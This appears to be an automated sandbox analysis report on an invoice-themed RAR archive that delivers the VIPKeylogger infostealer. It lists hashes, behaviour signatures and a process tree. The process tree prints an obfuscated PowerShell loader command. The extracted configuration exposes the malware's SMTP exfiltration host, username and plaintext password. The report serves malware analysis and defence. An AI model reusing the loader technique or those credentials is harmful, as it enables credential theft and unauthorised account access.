Analysis
-
max time kernel
80s -
max time network
83s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
-
submitted
24/02/2025, 18:05
General
-
Target
payment.rar
-
Size
417KB
-
MD5
c0aba3e9e8641c901b98799bbbf3adff
-
SHA1
785a722cad8c1711a843d312467c9bbcaf44df7e
-
SHA256
934801a22972a860d0f209cb42a91b6f4dc6ae8ea60b1f6a5ae959b0c5dd4a94
-
SHA512
fcbcfd4758e03b1ba3a8c91fd428d608ea8bd99d448d2e362ac0a86bdc91f117d26658f3cd8b4fb208cde75abca552dfc0cd9fd0b8e1e418892dac71dd40802e
-
SSDEEP
12288:kZlnNx5CubImnelo81PRDaPSATAvU3z0fDjirgN:Wc+Ij1PhaPSnvUjMp
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
s46S2&4+ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
-
Blocklisted process makes network request 14 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
NSIS installer 2 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 51 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\payment.rar"1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zOC27D6787\Invoice Pending Payment.exe"C:\Users\Admin\AppData\Local\Temp\7zOC27D6787\Invoice Pending Payment.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\Admin\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"4⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\Desktop\Invoice Pending Payment.exe"C:\Users\Admin\Desktop\Invoice Pending Payment.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\Admin\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
Filesize
1KB
MD54226da851e83c58755a2eb2eeaedc9d6
SHA1d2e8ce3b48bc1430172c7522d6625e17b682f0dd
SHA256e76264e537db15fcefd3558d4f3bfac96cea3d07ff976c977996df3b954c548e
SHA5127a046574c53ae787f5ed004d3e15dd34450a82584799165d8826f164083a6ca06b299d4a7bf8605ba34315e944da48e4d49bd9e55eeeb355bbfb2a7eae78fed3
-
Filesize
472B
MD563804364511c8d2c841d4ebd7495d644
SHA16d9b1ac91eb1a79676d998f6d887788971725983
SHA256ce41a54dad28d58b961669b5e8166522cb5ec7eb38017c336a4ca5642ebc402c
SHA512cc2d90d60f30112ba45c016bda2dac4e1d74d0264ec04e3e0fdff7c1bedbd011e893e64a0a88fbc230aeeb5411220b90f7f0abca0502c197049e8028d6a0b53e
-
Filesize
472B
MD5e9a53c10c3e30b8344548a3beb86acee
SHA1bc6ecbe2151de401ac2de77a82aba693cae432c8
SHA256026d35bfaf96bddb71efbc0be774aa1388b9a278eb38a7ebbcc41111365f35d6
SHA5124baceff8dd3520d07f803ac61a8afd02d659827253d868e188cf02d92be900285865cd0fed4278e19cc87a69e2431ef578f11171c78493f536fd0487a77c2f40
-
Filesize
170B
MD51907d55ed5d1f2abe6e784f660e8179e
SHA1cf3cba3f1f0f0941d4ac2ca32e8a60f75c29d36a
SHA256afe59544e69f120df6f722383f206da391f1bd43105f282d4d5070c7d377ed03
SHA512aef96f18b730c14a7dc3830135834a57044609a92770e08617ff6b2cd2425cb9979af5f3ce71844273570083ae54efa846c44a5ddf6019a96b45f510989965a7
-
Filesize
410B
MD51a3f72b5fafcbd5dfb5888e82a29da55
SHA1a873bccf90050754d160242b61ab5577e941d2c6
SHA2562ca18945690ee70ac61c9c05a81152ec963c4fa478e9eb5b216733662ef8c993
SHA512dafeef918e5dcf9deaf1fb2073ee9d909cb56957e84f55734bd41f0ad0e519d9f95a32d6a1194e48644b500d5c240a78697afaefd2225519b07e2d9e51123005
-
Filesize
402B
MD5a561a59b07dafb264acf2b9a9d2d388d
SHA1a2ec8ecdcb302243a1540290f741bd15b88554fb
SHA2567186e2a55dfc422da8343fe7f0801bd972567b4aba7638c4c796eb11672c3854
SHA51290c6b34813faf23c06de1f837f7742b0f70c0489acbe9bc49e93728f07adae199a2b659258a42e530498238fecde25156489641cea9d9ef90316552dcef2b060
-
Filesize
410B
MD5a13b0cb46230d6398027a09e60cbf29a
SHA11bb1b2e9bc11ace560a1c978728cae6e8acb0305
SHA256f9d5188341da6184904bc8cb55413f2cc5f36a2ffa85eb3ca8e34d35f7f60c0a
SHA512c9c7b4d6d533be3d91034159558d844371f3e4b58e1a71438dc55df693f2f0ee79e60ab5868043b57008c96f745b341aad794728b67c5282468084c00a401031
-
Filesize
60KB
MD5535b473ec3e9c0fd5aad89062d7f20e8
SHA1c900f90b3003452b975185c27bfb44c8f0b552c4
SHA256f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0
SHA51233f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86
-
Filesize
495KB
MD5e70e71a31781b44f850a39693784ce74
SHA1ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
SHA256a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
SHA5122a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD551e63a9c5d6d230ef1c421b2eccd45dc
SHA1c499cdad5c613d71ed3f7e93360f1bbc5748c45d
SHA256cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f
SHA512c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522
-
Filesize
58KB
MD5798e71f2fb7aeccbf532d4b9c7484b56
SHA1d22784524ac6412395f51a3fd3fe0cfba04f034c
SHA2561669d04c0289873aa79409ac3522a90ce116740f52c11eb8833aaf5c8908acb8
SHA51229f868a51ac1b4c25a4a7d1fad093e6fccc3adc762f8fa791c8e728aaf16a26ce0e43cdf45f955d0152d94ccff514776426bfb9a088cebf77ef9521a642606bf
-
Filesize
330KB
MD5a4dd91d5acfa3d8154510a16a27792df
SHA17f797beecc8609a7b617a7ccd6ba8a335d475a47
SHA2565ae90ee62220502c1041b177854398c94b9f42f6115ce6fca120b7c0702c0286
SHA5128f119081cf9625f036ac4783a7d127d25e8bf82bc6febe804edac2d18b71b9e85ab2c26cb04aa1a28a47cc1d49bd0676d486fea917ca872b7c2e43a6af889c07
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
320KB
-
Filesize
1.8MB
-
Filesize
624KB
-
Filesize
288KB
-
Filesize
19.1MB
-
Filesize
19.1MB
-
Filesize
288KB
-
Filesize
19.1MB
-
Filesize
136KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
32KB
-
Filesize
29.2MB
-
Filesize
104KB
-
Filesize
84KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
208KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
656KB
-
Filesize
6.5MB
-
Filesize
5.6MB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
216KB